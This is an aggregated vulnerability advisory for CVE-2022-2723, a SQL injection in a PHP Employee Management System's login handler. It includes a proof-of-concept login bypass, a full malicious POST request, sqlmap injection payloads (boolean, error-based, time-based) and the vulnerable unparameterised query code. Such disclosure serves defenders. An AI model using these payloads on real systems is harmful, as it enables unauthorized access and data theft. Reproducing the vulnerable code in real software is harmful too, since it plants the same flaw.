Headline

CVE-2022-2723: PHP代码审计—Employee Management System eprocess.php SQL Injection

A vulnerability was found in SourceCodester Employee Management System. It has been classified as critical. Affected is an unknown function of the file /process/eprocess.php. The manipulation of the argument mailuid/pwd leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-205836.

2 years ago

CVE

Open in Source

#sql #vulnerability #web #windows #apple #php #chrome #webkit

SourceCodester Employee Management System eprocess.php SQL Injection****Vendor Homepage:

https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html

Source Code Download：

https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip

Proof of Concept

Step 1: Open the URL http://127.0.0.1/ems/elogin.html

Step 2: Use payload 1’ or 1 # in Email and anything in Password

Step 3: login success

Malicious Request.

POST /ems/process/eprocess.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 40
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 Edg/104.0.1293.47
Referer: http://192.168.88.195/ems/elogin.html
Accept-Encoding: gzip, deflate
Connection: close

mailuid=1%27+or+1+%23&pwd=1&login-submit=Login

Sqlmap

---
Parameter: mailuid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: mailuid=-2408' OR 3144=3144#&pwd=1&login-submit=Login

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: mailuid=1' OR (SELECT 8327 FROM(SELECT COUNT(*),CONCAT(0x7171707871,(SELECT (ELT(8327=8327,1))),0x7162787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pIQl&pwd=1&login-submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: mailuid=1' AND (SELECT 4704 FROM (SELECT(SLEEP(5)))vpmb)-- thNh&pwd=1&login-submit=Login
---

code

/process/eprocess.php line 5-12，

$email = $_POST['mailuid'];
$password = $_POST['pwd'];

$sql = "SELECT * from `employee` WHERE email = '$email' AND password = '$password'";
$sqlid = "SELECT id from `employee` WHERE email = '$email' AND password = '$password'";

$result = mysqli_query($conn, $sql);
$id = mysqli_query($conn , $sqlid);

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

11 months ago

11 months ago

11 months ago

11 months ago

11 months ago